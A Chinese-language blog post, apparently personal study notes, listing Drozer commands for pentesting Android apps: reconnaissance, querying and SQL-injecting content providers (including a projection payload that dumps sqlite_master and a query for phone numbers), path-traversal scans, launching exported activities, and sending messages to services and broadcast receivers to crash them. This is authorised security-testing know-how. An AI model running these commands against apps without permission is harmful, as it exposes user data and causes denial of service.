Pentest_Android_APP_with_Drozer

最近在学习Android的渗透测试,当然,不是挖掘Android系统的漏洞,而是对Android下的各种APP进行渗透测试。
本文根据各种资料,整理出使用Drozer工具分析Android APP四大组件的安全性的方法。

Drozer工具的简介与安装步骤,可通过Google搜索,本文不再赘述。

信息收集

1
2
3
- run app.package.list -f manu ##搜索包含指定字符的包名
- run app.package.info -a com.AAAAA.move ##列出该包的详细信息
- run app.package.attacksurface com.AAAAA.move ##列出所有攻击面,也就是四大组件的暴露情况

攻击content provider

1
2
3
4
5
6
7
8
- run app.provider.info -a com.AAAAA.move ##列出该包所有的content provider
- run app.provider.finduri com.AAAAA.move ##查找所有content provider的URI
- run app.provider.query content://com.snda.youmi.providers.data/contents/ -- vertical ##查看这个content的内容
- run app.provider.query content://com.snda.youmi.providers.data/contents --projection "phone_number" ##查看数据库内容
- run scanner.provider.injection -a com.AAAAA.move ##扫描content provider是否存在注入漏洞
- run scanner.provider.traversal -a com.AAAAA.move ##扫描content provider是否存在文件遍历漏洞
- run app.provider.query content://com.snda.youmi.providers.data/contents/ --projection "'" ##手工检测注入
- run app.provider.query content://com.snda.youmi.providers.data/contents/ --projection "* from sqlite_master where type='table';--" --vertical ##实际注入

攻击activity

1
2
- run app.activity.info -a com.AAAAA.move ##列出该包所有的activity
- run app.activity.start --component com.AAAAA.move com.AAAAA.core.ui.InitialActivity ##启动这个包的这个activity

攻击service

1
2
- run app.service.info -a com.AAAAA.move ##列出这个包的所有的service
- run app.service.send com.AAAAA.move com.salesforce.androidsdk.auth.AuthenticatorService --msg 1 5 3 ##向这个包的这个service发消息,有可能导致app crash,形成本地拒绝服务

攻击broadcast receiver

1
2
- run app.broadcast.info -a com.AAAAA.move ##列出这个包的所有broadcast
- run app.broadcast.send --component com.AAAAA.move com.AAAAA.move3.notification.receiver.NotificationRecevier ##给这个包的这个broadcast发消息,有可能导致app crash,形成本地拒绝服务
你的打赏,我的干粮